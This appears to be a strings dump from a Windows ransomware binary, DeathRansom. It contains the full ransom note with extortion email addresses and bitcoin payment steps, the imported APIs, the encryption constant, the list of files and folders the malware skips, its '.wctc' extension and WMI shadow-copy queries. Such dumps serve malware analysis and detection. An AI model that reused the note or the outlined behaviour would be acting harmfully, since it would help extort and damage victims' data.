!This program cannot be run in DOS mode.
Rich3z
`.rdata
@.data
.reloc
VWjPSP
LwH'3E
D$<PVh
0123456789abcdefghijklmnopqrstuvwxyz
public
private
--= DEATHRANSOM =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
All your files, documents, photos, databases and other important
files are encrypted.
You are not able to decrypt it by yourself! The only method
of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an
email death@firemail.cc and decrypt one file for free. But this
file should be of not valuable!
Do you really want to restore your files?
Write to email
death@cumallover.me
death@firemail.cc
Your LOCK-ID: %s
>>>How to obtain bitcoin:
The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.
https://localbitcoins.com/buy_bitcoins
Also you can find other places to buy Bitcoins and beginners guide here:
http://www.coindesk.com/information/how-can-i-buy-bitcoins/
>>> Free decryption as guarantee!
Before paying you send us up to 1 file for free decryption.
We recommeded to send pictures, text files, sheets, etc. (files no more than 1mb)
IN ORDER TO PREVENT DATA DAMAGE:
1. Do not rename encrypted files.
2. Do not try to decrypt your data using third party software, it may cause permanent data loss.
3. Decryption of your files with the help of third parties may cause increased price (they add their fee to
our) or you can become a victim of a scam.
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
IsWow64Process
kernel32.dll
advapi32.dll
SystemFunction036
SOFTWARE\Wacatac
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
wnsprintfA
wnsprintfW
StrStrW
SHLWAPI.dll
MSVCRT.dll
SHEmptyRecycleBinA
SHELL32.dll
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
MPR.dll
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
ReadFile
WriteFile
QueueUserWorkItem
InterlockedExchangeAdd
CloseHandle
SetFilePointerEx
lstrlenA
FindFirstFileW
FindNextFileW
FindClose
CreateFileW
lstrcpyW
lstrcmpW
MoveFileW
GetCurrentProcess
lstrlenW
GetModuleHandleA
GetProcAddress
LoadLibraryA
GetUserDefaultLangID
GetLogicalDriveStringsW
ExitProcess
KERNEL32.dll
CharLowerW
GetKeyboardLayoutList
USER32.dll
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
ADVAPI32.dll
CoCreateInstance
CoSetProxyBlanket
ole32.dll
OLEAUT32.dll
memcpy
memset
expand 32-byte k
6"6e6l6j7u7}7
j0t0"1(1F1
9(:/:z:
;5<<<V<
>?>j>s>y>~>
>X?n?x?
0<0R0Y0
101P1^1
2w2~2i3o3{3
7*7:7E7U7`7g7
8 8.858;8G8
9,999B9O9b9o9
:H:[:b:}:
;-;4;=;L;Q;^;e;k;{;
;*<B<P<
=%>/>A>G>Q>c>i>s>
0b1p1u1
8%818<8B8T8o8u8
9 9)9/959<9A9L9V9s9|9
:2:9:_:g:n:t:
\3`3d3h3l3p3t3x3|3
programdata
$recycle.bin
program files
windows
all users
appdata
read_me.txt
autoexec.bat
desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat.log
thumbs.db
%s.wctc
%s\read_me.txt
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.ID='%s'
\\?\%c: